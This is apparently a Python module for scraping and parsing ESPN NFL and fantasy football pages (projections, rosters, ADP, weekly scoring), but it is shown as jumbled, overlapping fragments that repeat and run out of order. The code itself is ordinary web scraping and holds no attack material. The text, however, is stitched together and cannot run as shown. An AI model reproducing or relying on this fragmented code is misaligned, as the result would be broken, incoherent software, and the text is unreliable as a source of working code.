Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p =", "\"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] =", "Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__", "k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]:", "default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else:", "Parses season-long ADP Args: content: Returns: list of dict \"\"\" vals = []", "page Args: content: HTML string Returns: list of dict \"\"\" players = []", "= re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] =", "return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players", "\"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\",", "managing fantasy teams # NOTE: trouble accessing data in offseason # will have", "\"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com", "of ESPN players by position Args: content: pos: Returns: list: of dict \"\"\"", "(int): 2017, 2016, etc. 
week (int): 1 through 17 position (str): 'qb', 'wr',", "else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else:", "accessing data in offseason # will have to revisit this module as season", "\"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args:", "= tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"])", "Parses team roster page into list of player dict Args: content: HTML of", "k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self,", "'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\")", "TODO: revise based on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\":", "into list of player dict Args: content: HTML of espn nfl team roster", "in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team, position", "of dict \"\"\" # TODO: adapt for dst results = [] headers =", "kickers Args: content (str): HTML Returns: list: of dict \"\"\" # TODO: adapt", "= \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\"", "HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week,", "stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric", "numeric 0 Args: val: Returns: number \"\"\" if \"--\" in val: return 0", "in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: 
api_player[key] =", "teams # NOTE: trouble accessing data in offseason # will have to revisit", "qb, rb, wr, te, k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return", "= [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\",", "] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds =", "\"\"\" Parses team roster page into list of player dict Args: content: HTML", "if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url =", "https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset,", "20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26:", "tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")})", "page into list of player dict Args: content: HTML of espn nfl team", "scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args:", "\"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\",", "NOTE: trouble accessing data in offseason # will have to revisit this module", "def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. 
Returns: dict:", "vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long", "in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() == \"k\":", "\"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser:", "child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for", "# tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return players", "slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset))", "return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def", "of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML", "season_year (int): 2017, 2016, etc. 
week (int): 1 through 17 position (str): 'qb',", "[ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k,", "= link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses", "\"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row", "\"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\",", "\"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\",", "= tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return", "soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player =", "adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of dict \"\"\" vals", "player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\"", "= {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40}", "\"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\",", "BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [", "40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset >", "{\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]:", "revise based on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0,", "\"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", 
\"D/ST\", \"DST\",", "{ 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\",", "is valid and uppercase Args: pos(str): Returns: str \"\"\" if pos in [", "HTML TODO: rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2,", "page with projections by position Args: pos: str qb, rb, wr, te, k,", "scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError:", "wr, te, k, etc. season_year: int 2017, 2016 week: int 1, 2, 3", "have to remove & split vals = [self._val(td.text) for td in tds[3:]] for", "player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link", "season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position Args: pos: str", "& split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content,", "[ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\",", "Args: pos: str qb, rb, wr, te, k, etc. 
season_year: int 2017, 2016", "from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\",", "\"--\" in val: return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long", "\"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for", "link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\")", "> max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise", "in one column so have to remove & split vals = [self._val(td.text) for", "Returns: list: of dict \"\"\" # TODO: adapt for dst results = []", "fantasy data # espn_fantasy is mostly about managing fantasy teams # NOTE: trouble", "player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines", "offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0:", "= row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"]", "offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) #", "2, 3 offset: int 0, 40, 80, etc. 
Returns: HTML string TODO: revise", "@staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args: pos(str):", "self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players from", "\"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] =", "_check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args: pos(str): Returns: str", "to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster page", "\"\"\" Makes sure pos is valid and uppercase Args: pos(str): Returns: str \"\"\"", "= row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"]", "parsing espn football data # this does include some basic fantasy data #", "adp data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url =", "namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2:", "\"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if", "% 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\"", "[\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\",", "\"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\",", "data # this does include some basic fantasy data # espn_fantasy is mostly", "= scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except", "self._p = parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season", "\"\"\" vals = [] for item in 
content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\",", "= {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17}", "api_player = {k: v for k, v in item[\"player\"].items() if k in tl_wanted}", "NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string", "player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"]", "Makes sure pos is valid and uppercase Args: pos(str): Returns: str \"\"\" if", "api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals", "else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN", "# classes for scraping, parsing espn football data # this does include some", "position Args: content: pos: Returns: list: of dict \"\"\" players = [] soup", "this module as season approaches \"\"\" import logging import re from bs4 import", "page Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\")", "in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player", "in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child,", "results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst", "else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser()", "\"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\",", "they have attempts/completions in one column so have to remove & split vals", "link[\"href\"]) if 
match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text #", "list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster page into", "pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\",", "17} if position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url", "week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\"", "= set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds =", "= match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player)", "poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\":", "Args: content: pos: Returns: list: of dict \"\"\" players = [] soup =", "\"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\",", "to remove & split vals = [self._val(td.text) for td in tds[3:]] for header,", "self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections", "soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")})", "match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to", "raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if", "\"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos", "football season-long sortable projections page Args: content: HTML string Returns: list of dict", "{k: v for k, v 
in item[\"player\"].items() if k in tl_wanted} for scoring_type", "trouble accessing data in offseason # will have to revisit this module as", "21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27:", "rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key]", "Parses page of ESPN players by position Args: content: pos: Returns: list: of", "players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML", "etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos,", "17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23:", "None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy football", "17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for new", "split vals = [self._val(td.text) for td in tds[3:]] for header, val in zip(headers,", "[] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\",", "nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag):", "new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6,", "pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data", "content (str): HTML Returns: list: of dict \"\"\" results = [] headers =", "params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params)", "week (int): 1 through 17 position (str): 'qb', 'wr', etc. 
Returns: str: HTML", "cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s =", "def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of dict \"\"\"", "player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats #", "2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in", "] api_player = {k: v for k, v in item[\"player\"].items() if k in", "offset % 40 > 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url =", "raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\":", "class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\"", "kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\",", "16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160,", "logging import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site", "[\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos)) def", "{\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if", "Parses weekly scoring page for kickers Args: content (str): HTML Returns: list: of", "\"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value", "position.lower() not in poscode: raise ValueError(\"invalid position: {}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\"", "for td in row.find_all(\"td\", class_=\"playertableStat\")] if 
tds: player = dict(zip(headers, tds)) # name,", "\"\"\" Parses weekly scoring page for kickers Args: content (str): HTML Returns: list:", "params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com", "2019, etc. Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" )", "player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text", "\"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\"", "# tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\":", "re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td>", "\"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\",", "dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child", "= child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page", "def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc.", "@staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of dict", "pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\",", "if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else:", "\"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: 
params[\"scoringPeriodId\"]", "etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self,", "offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week:", "href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link:", "players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link =", "adapt for kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\",", "pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\",", "][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos):", "BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds =", "in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\",", "{\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset", "= None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN fantasy", "26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34:", "= [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\",", "Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def", "\"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\",", "\"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through 
stats # they", "params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list", "= soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td", "import logging import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import", "'qb', 'wr', etc. Returns: str: HTML TODO: rework for new URL \"\"\" poscode", "Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\"", "HTML Returns: list: of dict \"\"\" results = [] headers = [ \"c_a\",", "player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\",", "(str): HTML Returns: list: of dict \"\"\" results = [] headers = [", "import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\",", "28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper):", "Parses ESPN fantasy football season-long sortable projections page Args: content: HTML string Returns:", "season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc. 
Returns: list:", "\"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\",", "if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\",", "dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def", "Args: content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for dst", "season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for", "\"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not", "projections(self, content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page Args:", "\"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\":", "raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args: season_year(int):", "content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other", "te, k, etc. 
season_year: int 2017, 2016 week: int 1, 2, 3 offset:", "row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"}", "Gets list of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc.", "\"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args:", "for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\":", "29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape", "NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = {", "23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29:", "\"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]:", "0, 40, 80, etc. Returns: HTML string TODO: revise based on new URL", "TODO: rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\":", "@staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val: Returns:", "0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if", "\"lastName\", \"proTeamId\", ] api_player = {k: v for k, v in item[\"player\"].items() if", "0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params", "player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text", "\"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\",", "data in offseason # will have to revisit this module as season approaches", "KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses", 
"\"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if", "will have to revisit this module as season approaches \"\"\" import logging import", "\"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\",", "row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] =", "dst Args: content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for", "= val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}):", "Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for", "with projections by position Args: pos: str qb, rb, wr, te, k, etc.", "2017, 2016, etc. week (int): 1 through 17 position (str): 'qb', 'wr', etc.", "for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower()", "{\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\"", "Returns: list: of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for", "def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year", "for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] = child.string.split()[1:3]", "{}\".format(offset)) if offset % 40 > 0: raise 